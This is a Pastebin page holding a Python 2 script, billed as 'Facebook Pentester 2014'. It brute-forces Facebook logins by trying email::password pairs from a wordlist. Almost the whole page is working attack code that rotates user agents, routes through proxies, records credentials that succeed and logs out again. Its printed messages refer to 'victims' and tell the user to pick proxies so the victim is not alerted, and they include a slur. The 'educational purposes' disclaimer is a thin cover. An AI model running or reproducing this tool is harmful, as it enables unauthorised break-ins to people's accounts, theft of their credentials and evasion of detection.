API tools faq
paste
KilledSecurity

Pentester Facebook By Mr.GladiatorX207

KilledSecurity
Oct 24th, 2014
556
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 15.04 KB | None | 0 0
raw download clone embed print report
  1.    
  2.  
  3.     #!/usr/bin/python
  4.     #Facebook Pentester 2014 can crack into Facebook Id's 100% without Interruption By Facebook Firewall !
  5.     #This program is for sale & the objectif of this product is only for educational purposes only.
  6.     #Changing Description of this Script won't make you the coder ^_^ !
  7.     #Don't Crack people facebook account's it's illegal !
  8.     #If you want to crack into someone's account, you must have the permission of the user.
  9.     #Mr.GladiatorX207 is not responsible.
  10.      
  11.     import re
  12.     import os
  13.     import sys
  14.     import random
  15.     import warnings
  16.     import time
  17.     try:
  18.             import mechanize
  19.     except ImportError:
  20.             print "[*] Please install mechanize python module first"
  21.             sys.exit(1)
  22.     except KeyboardInterrupt:
  23.             print "\n[*] Exiting program...\n"
  24.             sys.exit(1)
  25.     try:
  26.             import cookielib
  27.     except ImportError:
  28.             print "[*] Please install cookielib python module first"
  29.             sys.exit(1)
  30.     except KeyboardInterrupt:
  31.             print "\n[*] Exiting program...\n"
  32.             sys.exit(1)
  33.      
  34.     warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
  35.      
  36.     # define variable
  37.     __Script__   = "Facebook Pentester 2014 Priv8888!"
  38.     __Released__ = "22/10/2014 By Mr.GladiatorX207"
  39.     __moi__  = "Facebook Checkpoint Security Bypassed 100%"
  40.     verbose         = False
  41.     useproxy        = False
  42.     usepassproxy    = False
  43.     log             = 'ghost.log'
  44.     file            = open(log, "a")
  45.     success         = 'home_edit_profile'
  46.     checkpoint      = 'checkpoint'
  47.     oldpass         = 'You entered an old password'
  48.     fblogin         = 'https://login.facebook.com/login.php?login_attempt=1'
  49.     # some priv8 useragents for Facebook Security !
  50.     useragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  51.                     'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  52.                     'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  53.                     'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  54.                     'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  55.                     'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
  56.                     'Microsoft Internet Explorer/4.0b1 (Windows 95)',
  57.                     'Opera/8.00 (Windows NT 5.1; U; en)',
  58.                     'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  59.                     'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
  60.                     'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  61.                     'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
  62.                     'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 [email protected])',
  63.                     'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
  64.                     ]
  65.     facebook        = '''
  66.    
  67.    #Facebook Pentester 2014 Priv8.
  68.    #Coded By Mauritania Attacker Modifed By Mr.GladiatorX207
  69.    #Features: Verbose Method + Intrusion.
  70.    #Details: Pentest Facebook Accounts + Anonymous Fast Proxy Undetectable.
  71.    
  72.    Script : %s
  73.    New Security Bypass : %s
  74.    Released    : %s''' % (__Script__, __moi__, __Released__)
  75.     option          = '''
  76.    Usage  : %s -w pentest.txt
  77.    Option : -w, --wordlist         <filename>      |   Wordlist used for Cracking
  78.            -v, --verbose                          |   Set %s will be verbose
  79.            -p, --proxy            <host:port>     |   Set http proxy will be use
  80.            -k, --usernameproxy    <username>      |   Set username at proxy will be use
  81.            -i, --passproxy        <password>      |   Set password at proxy will be use
  82.            -l, --log              <filename>      |   Specify output filename (default : ghost.log)
  83.            -h, --help             <help>          |   Print this help
  84.    
  85.    Example : %s -w pentest.txt"
  86.    
  87.    P.S : add "&" to run in the background
  88.    ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
  89.     hme             = '''
  90.    Usage : %s -w pentest.txt
  91.           -h or --help for get help
  92.           ''' % sys.argv[0]
  93.      
  94.     def helpme():
  95.             print facebook
  96.             print option
  97.             file.write(facebook)
  98.             file.write(option)
  99.             sys.exit(1)
  100.      
  101.     def helpmee():
  102.             print facebook
  103.             print hme
  104.             file.write(facebook)
  105.             file.write(hme)
  106.             sys.exit(1)
  107.      
  108.     for arg in sys.argv:
  109.             try:
  110.                     if arg.lower() == '-u' or arg.lower() == '--user':
  111.                             username = sys.argv[int(sys.argv[1:].index(arg))+2]
  112.                     elif arg.lower() == '-w' or arg.lower() == '--wordlist':
  113.                             wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
  114.                     elif arg.lower() == '-l' or arg.lower() == '--log':
  115.                             log = sys.argv[int(sys.argv[1:].index(arg))+2]
  116.                     elif arg.lower() == '-p' or arg.lower() == '--proxy':
  117.                             useproxy = True
  118.                             proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
  119.                     elif arg.lower() == '-k' or arg.lower() == '--userproxy':
  120.                             usepassproxy = True
  121.                             usw = sys.argv[int(sys.argv[1:].index(arg))+2]
  122.                     elif arg.lower() == '-i' or arg.lower() == '--passproxy':
  123.                             usepassproxy = True
  124.                             usp = sys.argv[int(sys.argv[1:].index(arg))+2]
  125.                     elif arg.lower() == '-v' or arg.lower() == '--verbose':
  126.                             verbose = True
  127.                     elif arg.lower() == '-h' or arg.lower() == '--help':
  128.                             helpme()
  129.                     elif len(sys.argv) <= 1:
  130.                             helpmee()
  131.             except IOError:
  132.                     helpme()
  133.             except NameError:
  134.                     helpme()
  135.             except IndexError:
  136.                     helpme()
  137.      
  138.     def bruteforce(word):
  139.             try:
  140.                     pos = word.find("::")
  141.                     userEmail = word[0:pos]
  142.                     word = word[pos+len("::"):len(word)]
  143.                    
  144.                     print("userEmail: " + userEmail )
  145.                     print("password: " + word )
  146.                     file.write("[*] Trying " + userEmail + "::" + word + "\n" )
  147.                     sys.stdout.flush()
  148.                     rch = random.choice(useragent)
  149.                     br.addheaders = [('User-agent', rch)]
  150.                     # print("User Agent: " + rch )
  151.                     opensite = br.open(fblogin)
  152.      
  153.                     # To show and print all forms name
  154.                     # for form in br.forms():
  155.                     #      print "Form name:", form.name
  156.                     #      print form
  157.      
  158.                     # To show all control elements in the form
  159.                     # br.form = list(br.forms())[0]
  160.                     # for control in br.form.controls:
  161.                     #      print control
  162.                     #      print "type=%s, name=%s value=%s" % (control.type, control.name, br[control.name])
  163.      
  164.                     # To dump cookies data being sent and received
  165.                     # dump();
  166.      
  167.                     # Release email account from autotext fill
  168.                     # If email still auto-filled on login form, this script would not work as expected, so we need to release it
  169.      
  170.                     NotMe = "notme_cuid"
  171.                     for link in br.links():
  172.                             if (NotMe in link.url):
  173.                                     request = br.click_link(link)
  174.                                     response = br.follow_link(link)
  175.                                     # print response.geturl()
  176.      
  177.                     br.select_form(nr=0)
  178.      
  179.                     br.form = list(br.forms())[0]
  180.                     br.form['email'] = userEmail
  181.                     br.form['pass'] = word
  182.                     br.submit()
  183.                     response = br.response().read()
  184.      
  185.                     if verbose:
  186.                             print response
  187.                     if success in response:
  188.                             print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
  189.                             print "[*] userEmail : %s" % (userEmail)
  190.                             print "[*] Password : %s\n" % (word)
  191.                             file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
  192.                             file.write("\n[*] userEmail : %s" % (userEmail))
  193.                             file.write("\n[*] Password : %s\n\n" % (word))
  194.      
  195.                             # After the successful login, force to Logout (to clear the cookies & the session - Very important!)
  196.                             for form in br.forms():
  197.                                     if form.attrs['id'] == 'logout_form':
  198.                                             br.form = form
  199.                                             br.submit()
  200.                     elif checkpoint in response:
  201.                             print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
  202.                             print "[*] userEmail : %s" % (userEmail)
  203.                             print "[*] Password : %s\n" % (word)
  204.                             file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
  205.                             file.write("\n[*] userEmail : %s" % (userEmail))
  206.                             file.write("\n[*] Password : %s\n\n" % (word))
  207.      
  208.                             # In checkpoint, this account maybe has been logged in, so we need to Log it Out after the successful login
  209.                             LogOut = "logout.php"
  210.                             for link in br.links():
  211.                                     if (LogOut in link.url):
  212.                                             request = br.click_link(link)
  213.                                             response = br.follow_link(link)
  214.                                             # print response.geturl()
  215.                                             # print "This account has been logged out"
  216.                                     # else:
  217.                                     #        print "Can not click Log Out link"
  218.                            
  219.             except KeyboardInterrupt:
  220.                     print "\n[*] Exiting program...\n"
  221.                     sys.exit(1)
  222.             except mechanize._mechanize.FormNotFoundError:
  223.                     print "\n[*] Form Not Found\n"
  224.                     file.write("\n[*] Form Not Found\n")
  225.                     sys.exit(1)
  226.             except mechanize._form.ControlNotFoundError:
  227.                     print "\n[*] Control Not Found\n"
  228.                     file.write("\n[*] Control Not Found\n")
  229.                     sys.exit(1)
  230.      
  231.     # Priv8 Function to Dump Cookies Data
  232.     # def dump():
  233.     #       for cookie in cj:
  234.     #               print cookie.name, cookie.value
  235.      
  236.     def releaser():
  237.             global word
  238.             for word in words:
  239.                     bruteforce(word.replace("\n",""))
  240.      
  241.     def main():
  242.             global br
  243.             global words
  244.             # Priv8 Function to enable dump()
  245.             # global cj
  246.             try:
  247.                     br = mechanize.Browser()
  248.                     cj = cookielib.LWPCookieJar()
  249.                     br.set_cookiejar(cj)
  250.                     br.set_handle_equiv(True)
  251.                     br.set_handle_gzip(True)
  252.                     br.set_handle_redirect(True)
  253.                     br.set_handle_referer(True)
  254.                     br.set_handle_robots(False)
  255.                     br.set_debug_http(False)
  256.                     br.set_debug_redirects(False)
  257.                     br.set_debug_redirects(False)
  258.                     br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  259.                     if useproxy:
  260.                             br.set_proxies({"http": proxy})
  261.                     if usepassproxy:
  262.                             br.add_proxy_password(usw, usp)
  263.                     if verbose:
  264.                             br.set_debug_http(True)
  265.                             br.set_debug_redirects(True)
  266.                             br.set_debug_redirects(True)
  267.             except KeyboardInterrupt:
  268.                     print "\n[*] Exiting program...\n"
  269.                     file.write("\n[*] Exiting program...\n")
  270.                     sys.exit(1)
  271.             try:
  272.                     preventstrokes = open(wordlist, "r")
  273.                     words          = preventstrokes.readlines()
  274.                     count          = 0
  275.                     while count < len(words):
  276.                             words[count] = words[count].strip()
  277.                             count += 1
  278.             except IOError:
  279.                     print "\n[*] Error: Check your config path\n"
  280.                     file.write("\n[*] Error: Check your config path\n")
  281.                     sys.exit(1)
  282.             except NameError:
  283.                     helpme()
  284.             except KeyboardInterrupt:
  285.                     print "\n[*] Exiting program...\n"
  286.                     file.write("\n[*] Exiting program...\n")
  287.                     sys.exit(1)
  288.             try:
  289.                     print facebook
  290.                     print "\n[*] Starting Cracking at %s" % time.strftime("%X")
  291.                     #print "[*] Account To Crack %s" % (username)
  292.                     print "[*] Loaded :",len(words),"words"
  293.                     print "[*] Cracking, please wait..."
  294.                     file.write(facebook)
  295.                     file.write("\n[*] Starting Cracking at %s" % time.strftime("%X"))
  296.                     #file.write("\n[*] Account To Crack %s" % (username))
  297.                     file.write("\n[*] Loaded : %d words" % int(len(words)))
  298.                     file.write("\n[*] Cracking, please wait...\n")
  299.             except KeyboardInterrupt:
  300.                     print "\n[*] Script Closed...\n"
  301.                     sys.exit(1)
  302.             try:
  303.                     releaser()
  304.                     bruteforce(word)
  305.             except NameError:
  306.                     helpme()
  307.      
  308.     if __name__ == '__main__':
  309.             main()
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!